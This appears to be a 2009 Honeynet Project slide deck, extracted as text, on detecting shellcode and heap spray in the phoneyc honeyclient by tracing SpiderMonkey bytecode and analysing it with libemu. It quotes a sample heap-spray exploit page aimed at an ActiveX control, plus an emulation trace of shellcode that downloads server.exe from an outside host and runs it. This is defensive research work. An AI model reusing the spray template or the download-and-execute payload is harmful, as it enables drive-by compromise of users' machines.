shellcode and heapspray detection in phoneyc
TRANSCRIPT
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN . . . . . .
.
.
. ..
.
.
Shellcode and heapspray detection in phoneyc
Zhijie Chen1
1Honeynet Project Chinese Chapter
Honeynet Project on Google Summer of Code, 2009
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 2
Contents
.. .1 Introduction to phoneyc
.. .2 A Typical Web-Based Malware
.. .3 Shellcode detection using Libemu
.. .4 Tracing Mozilla Spidermonkey
Basic Principles of Spidermonkey
.. .5 Shellcode Detection in phoneyc
Basic IdeaDetailsRelated Source filesImplementation
.. .6 Heapspray Detection
.. .7 Current Results
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 3
Contents
.. .1 Introduction to phoneyc
.. .2 A Typical Web-Based Malware
.. .3 Shellcode detection using Libemu
.. .4 Tracing Mozilla Spidermonkey
Basic Principles of Spidermonkey
.. .5 Shellcode Detection in phoneyc
Basic IdeaDetailsRelated Source filesImplementation
.. .6 Heapspray Detection
.. .7 Current Results
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 4
Introduction to phoneyc
http://code.google.com/p/phoneyc/
A python honeyclient
Original written by Jose Nazario.
To detect Web-based Malware
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 5
Contents
.. .1 Introduction to phoneyc
.. .2 A Typical Web-Based Malware
.. .3 Shellcode detection using Libemu
.. .4 Tracing Mozilla Spidermonkey
Basic Principles of Spidermonkey
.. .5 Shellcode Detection in phoneyc
Basic IdeaDetailsRelated Source filesImplementation
.. .6 Heapspray Detection
.. .7 Current Results
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 6
A Typical Heapspray Mal-javascript I
1 <body><script>window.onerror=function(){return true;}</script><object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"
style=’display:none’ id=’target’></object><SCRIPT language="javascript">
6 var shellcode = unescape("%u9090"+"%u9090"+...(shellcode)"%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672
%u7265%u652e%u6578%u0000");</script><SCRIPT language="javascript">
11 var bigblock = unescape("%u9090%u9090");var headersize = 20;var slackspace = headersize+shellcode.length;while (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);
16 block = bigblock.substring(0, bigblock.length−slackspace);while(block.length+slackspace<0x40000)block = block+block+fillblock;
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 7
A Typical Heapspray Mal-javascript II
memory = new Array();for (x=0; x<100; x++) memory[x] = block +shellcode;
21 var buffer = ’’;while (buffer.length < 1024) buffer+="\x05";var ok="1111";target.Register(ok,buffer);</script>
26 </body>
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 8
Heap Status After Heapspray
| More than ??MB 0x90(NOP)s or some other x86 instructionsas a sledge | Shellcode |
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 9
Detecting Shellcode/Heapspray
SC/HS Detecting Tool: How To Detect It?
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 10
Contents
.. .1 Introduction to phoneyc
.. .2 A Typical Web-Based Malware
.. .3 Shellcode detection using Libemu
.. .4 Tracing Mozilla Spidermonkey
Basic Principles of Spidermonkey
.. .5 Shellcode Detection in phoneyc
Basic IdeaDetailsRelated Source filesImplementation
.. .6 Heapspray Detection
.. .7 Current Results
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 11
Introduction to libemu
.From it’s official site:..
.
. ..
.
.
libemu is a small library written in c offering basic x86emulation and shellcode detection using GetPC heuristics.Using libemu one can:
detect shellcodes
execute the shellcodes
profile shellcode behaviour
Using libemu to detect shellcode and heapspray in web-basedmalware: ¡¡Defending browsers against drive-by downloads:Mitigating heap-spraying code injection attacks¿¿)
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 12
Detecting x86 Instructions
SC/HS Detecting Time: When To Detect It?
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 13
Contents
.. .1 Introduction to phoneyc
.. .2 A Typical Web-Based Malware
.. .3 Shellcode detection using Libemu
.. .4 Tracing Mozilla Spidermonkey
Basic Principles of Spidermonkey
.. .5 Shellcode Detection in phoneyc
Basic IdeaDetailsRelated Source filesImplementation
.. .6 Heapspray Detection
.. .7 Current Results
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 14
Introduction to spidermonkey
.What is SpiderMonkey?..
.
. ..
.
.
SpiderMonkey is the code-name for the Mozilla’s Cimplementation ofJavaScript.(http://www.mozilla.org/js/spidermonkey/)
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 15
Basic Principles of Spidermonkey
All the javascript sources are compiled into js bytecodes.
There is an interpreter who interprets the bytecodes anddo certain simple actions.
All the javascript variables are stored as jsval.
Some of the values are store as an “atom”, such as strings.
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 16
Contents
.. .1 Introduction to phoneyc
.. .2 A Typical Web-Based Malware
.. .3 Shellcode detection using Libemu
.. .4 Tracing Mozilla Spidermonkey
Basic Principles of Spidermonkey
.. .5 Shellcode Detection in phoneyc
Basic IdeaDetailsRelated Source filesImplementation
.. .6 Heapspray Detection
.. .7 Current Results
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 17
Basic Idea
As both the shellcode manipulation and the spraying of thefillblock involve assignments. The shellcode will be detectedimmediately on it’s assignment if we are able to interruptspidermonkey at the interpretion of certain bytecodes related toan assignment and check its argments and values for shellcodes.
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 18
Details I
The following js codes:
function a(){b="c"; var a = 0;}
are compiled into bytecodes like:
00000: bindname "b"
00003: string "c"
00006: setname "b"
4 00009: pop00010: zero00011: setvar 000014: pop00015: stop
So, if we examine the set* opcodes’ arguments on the top ofthe stack in runtime, shellcodes won’t get passed!
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 19
Details
To do so, we need to:
Step trace the spidermonkey runtime.
Stop at the key bytecodes (such as setname, setvar,setprop, setarg etc.) on all kinds ofassignments.Unfortunately different assignments havedifferent bytecode accordingly.
But all the opcodes related to assignments share aJOF SET bit in their opcode descriptionstructure(./src/jsopcode.h).
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 20
Related Source files to be used later
jsapi.h:Basic APIs for javascript execution.
jsdbgapi.h:Basic APIs for debugging spidermonkey.
jsopcode.tbl:All the js opcodes(bytecodes).
jsinterp.c:You can find how each bytecode is interpretedhere.
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 21
Implementation
Register a trace handler into spidermonkey usingJS SetInterrupt. This handler will be called at each stepof the bytecode execution.
In the handler:
Use JS GetTrapOpcode to get currentopcode(bytecode).Use JS FrameIterator to get current runtime stack.Check the rvalue of the set* bytecodes on the top of thestack with libemu.Dump the shellcodes and alert.Contine the execution.
Privide this traced js virtual as a python module namedhoneyjs, so other part of phoneyc can use this module justthe same as python-spidermonkey with optional awarenessof the extra shellcode/heapspray detection APIs.
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 22
Contents
.. .1 Introduction to phoneyc
.. .2 A Typical Web-Based Malware
.. .3 Shellcode detection using Libemu
.. .4 Tracing Mozilla Spidermonkey
Basic Principles of Spidermonkey
.. .5 Shellcode Detection in phoneyc
Basic IdeaDetailsRelated Source filesImplementation
.. .6 Heapspray Detection
.. .7 Current Results
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 23
Basic Idea
.Heapspray..
.
. ..
.
.
A myriad of NOP-like x86 instructions
Accumulating through a loop of assignments
Shellcode in the end of each sledge
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 24
Basic Idea
.Heapspray..
.
. ..
.
.
A myriad of NOP-like x86 instructions
Accumulating through a loop of assignments
Shellcode in the end of each sledge
.Detection..
.
. ..
.
.
Now: A variable counter to record the mal-assignments(assignments containing shellcode in the r-value).
In the future: entropy ? the nozzle way?
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 25
Contents
.. .1 Introduction to phoneyc
.. .2 A Typical Web-Based Malware
.. .3 Shellcode detection using Libemu
.. .4 Tracing Mozilla Spidermonkey
Basic Principles of Spidermonkey
.. .5 Shellcode Detection in phoneyc
Basic IdeaDetailsRelated Source filesImplementation
.. .6 Heapspray Detection
.. .7 Current Results
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 26
A Run on ssreader 0day.html I
joyan@Jdeb:˜/code/phoneyc$ sh go.sh2 HONEYCLIENT MODULE TEST
fetching http://172.31.25.227/phoneyc/ssreader 0day.html[]==> http://172.31.25.227/phoneyc/ssreader 0day.htmlJS EVAL
7 Executing Javascript:DEBUG: !!!SC DETECTED at 141847268=141847572size:374DEBUG: !!!SC DETECTED at 141847524=141847756size:32728DEBUG: !!!SC DETECTED at 141723488=141847756size:32728DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
12...
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728SSReader Pdg2 Register method overflow
17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1Runing shellcode... offset:248DEBUG: Begin analyzing ...DEBUG: download http://1v1.name/server.exe −>
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 27
A Run on ssreader 0day.html II
c:\WINDOWS\system32\a.exe22
...
URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server.exe’]
Done27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1
[ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT:100
VBS EVAL IFRAMES []HREFS []FRAMES []
32 IMAGES []
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 28
Analysis of The Shellcode using libemu I
FARPROC WINAPI GetProcAddress (HMODULE hModule = 0x7c800000 =>
3 none;LPCSTR lpProcName = 0x0041710c =>
= "GetSystemDirectoryA";) = 0x7c814eea;FARPROC WINAPI GetProcAddress (
8 HMODULE hModule = 0x7c800000 =>none;
LPCSTR lpProcName = 0x00417120 =>= "WinExec";
) = 0x7c86136d;13 FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>none;
LPCSTR lpProcName = 0x00417128 =>= "ExitThread";
18 ) = 0x7c80c058;FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 29
Analysis of The Shellcode using libemu II
none;LPCSTR lpProcName = 0x00417133 =>
23 = "LoadLibraryA";) = 0x7c801d77;HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0x00417140 =>= "urlmon";
28 ) = 0x7df20000;FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7df20000 =>none;
LPCSTR lpProcName = 0x00417147 =>33 = "URLDownloadToFileA";
) = 0x7df7b0bb;UINT GetSystemDirectory (
LPTSTR lpBuffer = 0x0012fe5f =>none;
38 UINT uSize = 32;) = 19;HRESULT URLDownloadToFile (
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 30
Analysis of The Shellcode using libemu III
LPUNKNOWN pCaller = 0x00000000 =>none;
43 LPCTSTR szURL = 0x0041715a =>= "http://1v1.name/server.exe";
LPCTSTR szFileName = 0x0012fe5f =>= "c:\WINDOWS\system32\a.exe";
DWORD dwReserved = 0;48 LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0x0012fe58 =>= "cmd /c c:\WINDOWS\system32\a.exe";
53 UINT uCmdShow = 0;) = 32;
phoneyc withlibemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN 31
.
Thank you!.. .. ..
.
.